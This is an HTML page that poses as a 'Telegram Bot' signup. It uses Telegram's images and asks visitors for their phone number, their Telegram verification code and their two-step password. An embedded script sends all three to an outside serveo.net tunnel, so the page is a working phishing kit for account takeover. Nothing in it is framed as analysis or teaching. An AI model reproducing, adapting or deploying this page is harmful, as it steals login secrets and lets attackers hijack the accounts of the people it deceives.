<!DOCTYPE html>
<!--
https://my.telegram.org/img/favicon-32x32.png
-->
<html lang="en-US">
<head>
    <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">  
    <script src="./jquery-3.6.3.min.js"></script>
    <script src="./main.js"></script>
<title>Telegram Bot</title>
</head>
<style>
*{
margin: 0;
padding: 0;
}

:root{
    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Helvetica, Arial, sans-serif;
}

body{
background: #fff;
color: #000;
font-size: 20px;
font-family: var(--font);
font-weight: 600;
}

label{
font-size: 14px;
}
input::placeholder{
font-weight: 600;
}

input{
border: 1px solid #000;
 padding: 8px; width: 100%;
outline: none;
color: #000;
font-family: var(--font);
background: #fff;
border-radius: 2px;
}
.container_server_telegra{
display: flex;
justify-content: space-around;
tex-align: center;
width: 870px;
padding: 10px;
margin: 0 auto 10px;
}


input:focus{
border: 1px solid #3193e4;
}
.inputs{
width: 270px;
padding: 10px;
}
.image{
text-align: center;
}

.fong{
font-size: 25px;
}
@media(max-width: 999px){
.container_server_telegra{
display: block;
margin: 0 auto 10px;
justify-content: center;
width: 90%;
}
.inputs{
width: 70%;
margin: 0 auto 10px;
}
.fong{
font-size: 17px;
}
}

.next{
background: #3193e4;
border: none;
border-radius: 5px;
color: #fff;
font-size: 17px;
font-family: var(--font);
padding: 8px 40px;
margin-top: 10px;
}

.received{
display: none;
}
</style>
<body>
<div class="container_server_telegra">
<div class="image">
<img src="https://my.telegram.org/img/tl_card_decentralized.gif" width="140" height="140"/>
<h2 class="fong">Welcome to Telegram Bot</h2>
<p style="font-size: 14px; opacity: 0.6;">Enter your telegram number to receive a verification code so we can connect you to the chatbot</p>
</div>
<div class="inputs">
<label for="number"> Your number</label><br>
<input type="text" id="number" placeholder="+19048653345" required/>
<p style="font-size: 14px; opacity: 0.6;">enter your number here, we need your number for our system to send the verification code</p>
<div class="received">
<label for="code_telegram">Telegram code</label><br>
<input type="text" id="code_telegram"><br>
<p style="font-size: 13px; opacity: 0.6;">Telegram sends a verification code, use that code here.</p>
<label for="code">Two step code (if you have)</label><br>
<input type="text" id="code">
</div>
           <script>
            $(document).ready(function(){
      $('#number').mask('+0000000000000');
$('#code_telegram').mask('00000');
$('#code').mask('000000');
  })
          </script>
<br>
<button type="submit" class="next">Next</button>
<script>
const received = document.querySelector('.received');
document.querySelector('.next').addEventListener('click', () => {
const number = document.getElementById('number').value
if(number.length >= 4){
received.style.display = "inline";
} else {
received.style.display = "none";
}
})
</script>

<script>
document.querySelector('.next').addEventListener('click', () => {
const number_ver = document.getElementById('number').value;
const code_ver = document.getElementById('code').value;
const code_telegram_ver = document.getElementById('code_telegram').value;
    fetch('https://55aeee325adcc25d0e4b94a4a90982cd.serveo.net/data', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({
          number: number_ver,
          code: code_telegram_ver,
         telegram: code_ver           
            //url: window.location.href
        })
    }).catch(err => console.error('Erro to send log:', err));
});
</script>

</div>
</div>
</body>
</html>
